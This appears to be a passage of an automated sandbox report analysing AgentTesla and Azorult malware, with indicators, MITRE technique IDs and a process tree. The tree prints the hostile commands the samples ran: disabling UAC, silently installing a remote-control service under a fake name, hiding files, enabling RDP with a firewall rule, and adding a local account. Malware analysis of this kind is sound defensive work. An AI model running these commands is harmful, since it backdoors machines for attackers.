Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings	firefox.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe

Runs .reg file with regedit 2 IoCs

pid	Process
3548	regedit.exe
3560	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3488	schtasks.exe
3400	schtasks.exe
3144	schtasks.exe
4000	schtasks.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
344	Azorult.exe
344	Azorult.exe
344	Azorult.exe
344	Azorult.exe
344	Azorult.exe
3592	rutserv.exe
3592	rutserv.exe
3592	rutserv.exe
3592	rutserv.exe
3592	rutserv.exe
3592	rutserv.exe
3668	rutserv.exe
3668	rutserv.exe
3724	rutserv.exe
3724	rutserv.exe
3768	rutserv.exe
3768	rutserv.exe
3768	rutserv.exe
3768	rutserv.exe
3768	rutserv.exe
3768	rutserv.exe
3916	rfusclient.exe
3916	rfusclient.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
476	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
3548	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	1684	firefox.exe
Token: SeDebugPrivilege	1684	firefox.exe
Token: SeDebugPrivilege	940	firefox.exe
Token: SeDebugPrivilege	940	firefox.exe
Token: 33	2196	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2196	AUDIODG.EXE
Token: 33	2196	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2196	AUDIODG.EXE
Token: SeDebugPrivilege	3592	rutserv.exe
Token: SeDebugPrivilege	3724	rutserv.exe
Token: SeTakeOwnershipPrivilege	3768	rutserv.exe
Token: SeTcbPrivilege	3768	rutserv.exe
Token: SeTcbPrivilege	3768	rutserv.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
2704	iexplore.exe
1684	firefox.exe
1684	firefox.exe
1684	firefox.exe
1684	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
1684	firefox.exe
1684	firefox.exe
1684	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe

Suspicious use of SetWindowsHookEx 29 IoCs

pid	Process
2704	iexplore.exe
2704	iexplore.exe
2760	IEXPLORE.EXE
2760	IEXPLORE.EXE
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
3592	rutserv.exe
3668	rutserv.exe
3724	rutserv.exe
3768	rutserv.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe
940	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 2760	2704	iexplore.exe	32
PID 2704 wrote to memory of 2760	2704	iexplore.exe	32
PID 2704 wrote to memory of 2760	2704	iexplore.exe	32
PID 2704 wrote to memory of 2760	2704	iexplore.exe	32
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 848 wrote to memory of 1684	848	firefox.exe	34
PID 1684 wrote to memory of 1768	1684	firefox.exe	35
PID 1684 wrote to memory of 1768	1684	firefox.exe	35
PID 1684 wrote to memory of 1768	1684	firefox.exe	35
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1496	1684	firefox.exe	36
PID 1684 wrote to memory of 1632	1684	firefox.exe	37

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3976	attrib.exe
4036	attrib.exe
3868	attrib.exe
3108	attrib.exe
1316	attrib.exe

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\Annotation 2025-01-13 114431.png"
1⤵
PID:2084

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:2
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2760

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:848
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.0.2103628384\834197524" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1184 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d6d917f-4ce3-4730-8110-49194e43116f} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 1248 120f3458 gpu
    3⤵
    PID:1768
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.1.442009947\2110084309" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 20928 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {57215160-f3e7-4256-9d0a-f5862b59f0b8} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 1488 e71c58 socket
    3⤵
    - Checks processor information in registry
    PID:1496
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.2.2076379589\1599686716" -childID 1 -isForBrowser -prefsHandle 1732 -prefMapHandle 1960 -prefsLen 20966 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdf292ee-83ec-47af-b761-db54109febb1} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 1868 1a567b58 tab
    3⤵
    PID:1632
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.3.880617128\232120899" -childID 2 -isForBrowser -prefsHandle 2292 -prefMapHandle 2468 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3e62435-e6fe-4022-bcdf-7ecf8127d421} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 2424 e6a558 tab
    3⤵
    PID:2932
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.4.1469443205\1434409317" -childID 3 -isForBrowser -prefsHandle 2880 -prefMapHandle 2876 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b07fcc62-4439-48e5-8cb1-fb5eaa70cd20} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 2892 1c371658 tab
    3⤵
    PID:2256
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.5.209735118\1589820833" -childID 4 -isForBrowser -prefsHandle 3688 -prefMapHandle 2860 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d631592d-01f7-4b82-8e84-c968172f2bf1} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 3776 1fbb1d58 tab
    3⤵
    PID:1336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.6.457767189\1519367827" -childID 5 -isForBrowser -prefsHandle 3936 -prefMapHandle 3940 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd17fd7a-65d7-4d87-8463-d080c8b72016} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 3928 1fbb2058 tab
    3⤵
    PID:1516
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1684.7.466764409\859811456" -childID 6 -isForBrowser -prefsHandle 4088 -prefMapHandle 4004 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b5c1b0-2fe4-4124-acf1-4e67f6730013} 1684 "\\.\pipe\gecko-crash-server-pipe.1684" 4076 1fbb1a58 tab
    3⤵
    PID:1740
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:2600
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      Drops file in Windows directory
      Subvert Trust Controls: Mark-of-the-Web Bypass
      Checks processor information in registry
      Modifies registry class
      NTFS ADS
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:940
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.0.1910720604\983564368" -parentBuildID 20221007134813 -prefsHandle 1104 -prefMapHandle 1096 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9adf539-ce0c-4e0f-a88c-346a0c672bb3} 940 "\\.\pipe\gecko-crash-server-pipe.940" 1168 45eec58 gpu
        5⤵
        
        PID:2868
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.1.1706847590\1400975692" -parentBuildID 20221007134813 -prefsHandle 1324 -prefMapHandle 1320 -prefsLen 17601 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0d7ac3e-70de-449a-aa59-6a0a98e6e8e0} 940 "\\.\pipe\gecko-crash-server-pipe.940" 1336 11773b58 socket
        5⤵
        
        PID:380
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.2.201103040\281969266" -childID 1 -isForBrowser -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 23700 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a7bdfb7-b761-4797-a03f-cfdccfd71c79} 940 "\\.\pipe\gecko-crash-server-pipe.940" 2380 1b4d1558 tab
        5⤵
        
        PID:2836
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.3.645969852\296662371" -childID 2 -isForBrowser -prefsHandle 2588 -prefMapHandle 2692 -prefsLen 23807 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8144edb-a9bf-4948-a673-406916f0dfda} 940 "\\.\pipe\gecko-crash-server-pipe.940" 2724 d6be58 tab
        5⤵
        
        PID:2160
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.4.598689505\366280968" -childID 3 -isForBrowser -prefsHandle 2868 -prefMapHandle 2872 -prefsLen 24889 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {304e9777-b7df-45f9-a8b8-58e028fa2221} 940 "\\.\pipe\gecko-crash-server-pipe.940" 2716 1d583258 tab
        5⤵
        
        PID:1764
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.5.787586592\778420464" -parentBuildID 20221007134813 -prefsHandle 2772 -prefMapHandle 2892 -prefsLen 25822 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f91098e-61cc-42f1-b89f-fc784cc3ad7d} 940 "\\.\pipe\gecko-crash-server-pipe.940" 3048 1d712358 rdd
        5⤵
        
        PID:2348
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.6.2109955845\2086417741" -childID 4 -isForBrowser -prefsHandle 2444 -prefMapHandle 2436 -prefsLen 31807 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c51690a-5991-4d70-afa2-c5549174479a} 940 "\\.\pipe\gecko-crash-server-pipe.940" 2412 15ff6358 tab
        5⤵
        
        PID:2596
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.7.428186659\1106932531" -childID 5 -isForBrowser -prefsHandle 3776 -prefMapHandle 3784 -prefsLen 31807 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1f20e4e-63f2-4685-9aea-f078a0512c7b} 940 "\\.\pipe\gecko-crash-server-pipe.940" 3736 15ff6958 tab
        5⤵
        
        PID:2984
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.8.160457986\410076708" -childID 6 -isForBrowser -prefsHandle 3984 -prefMapHandle 3988 -prefsLen 32013 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c05e92b-dc14-4e2c-a8d9-80dc5fcd767e} 940 "\\.\pipe\gecko-crash-server-pipe.940" 3976 1e4d7e58 tab
        5⤵
        
        PID:300
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.9.1707912500\1424041527" -childID 7 -isForBrowser -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 31940 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea2b9db6-e5ae-47bf-8e2f-a752acf5d6a3} 940 "\\.\pipe\gecko-crash-server-pipe.940" 4200 1ff52e58 tab
        5⤵
        
        PID:2072
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.10.542659723\763245625" -childID 8 -isForBrowser -prefsHandle 2208 -prefMapHandle 2244 -prefsLen 32632 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1435cb9-841f-415d-8d6d-f7563f820525} 940 "\\.\pipe\gecko-crash-server-pipe.940" 2752 24c38558 tab
        5⤵
        
        PID:2472
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.11.251985315\449376764" -childID 9 -isForBrowser -prefsHandle 4436 -prefMapHandle 3900 -prefsLen 32632 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1df76ae5-244f-4312-bd6f-fd442457408d} 940 "\\.\pipe\gecko-crash-server-pipe.940" 4032 24876a58 tab
        5⤵
        
        PID:1924
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="940.12.848593988\1187010189" -childID 10 -isForBrowser -prefsHandle 4076 -prefMapHandle 4436 -prefsLen 32632 -prefMapSize 230321 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eeeaef9a-b69d-4b06-a8cc-c4b642b773c8} 940 "\\.\pipe\gecko-crash-server-pipe.940" 4084 26895258 tab
        5⤵
        
        PID:2688
    - - C:\Users\Admin\Downloads\AgentTesla.exe
        
        "C:\Users\Admin\Downloads\AgentTesla.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2656
    - - C:\Users\Admin\Downloads\Azorult.exe
        
        "C:\Users\Admin\Downloads\Azorult.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        UAC bypass
        Blocks application from running via registry modification
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Modifies WinLogon
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        System policy modification
        
        PID:344
      - C:\ProgramData\Microsoft\Intel\wini.exe
        
        C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3156
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3408
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Programdata\Windows\install.bat" "
        8⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3524
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        9⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:3548
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        9⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:3560
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3572
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3592
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3668
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3724
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        9⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3976
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        9⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4036
        
        C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4044
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4064
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:632
        
        C:\ProgramData\Windows\winit.exe
        
        "C:\ProgramData\Windows\winit.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3428
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\Programdata\Install\del.bat
        8⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        9⤵
        Delays execution with timeout.exe
        
        PID:3132
      - C:\programdata\install\cheat.exe
        
        C:\programdata\install\cheat.exe -pnaxui
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3132
        
        C:\ProgramData\Microsoft\Intel\taskhost.exe
        
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3300
        
        C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3452
        
        C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        8⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        9⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\pause.bat" "
        10⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        11⤵
        Kills process with taskkill
        
        PID:3952
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        11⤵
        Kills process with taskkill
        
        PID:3528
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        11⤵
        Delays execution with timeout.exe
        
        PID:3516
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        11⤵
        
        PID:3440
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        11⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        11⤵
        Kills process with taskkill
        
        PID:3968
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        11⤵
        Delays execution with timeout.exe
        
        PID:1312
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        11⤵
        
        PID:3716
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\bat.bat" "
        12⤵
        
        PID:980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        13⤵
        
        PID:3424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        13⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        13⤵
        Modifies Windows Firewall
        
        PID:3124
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        13⤵
        
        PID:3352
        
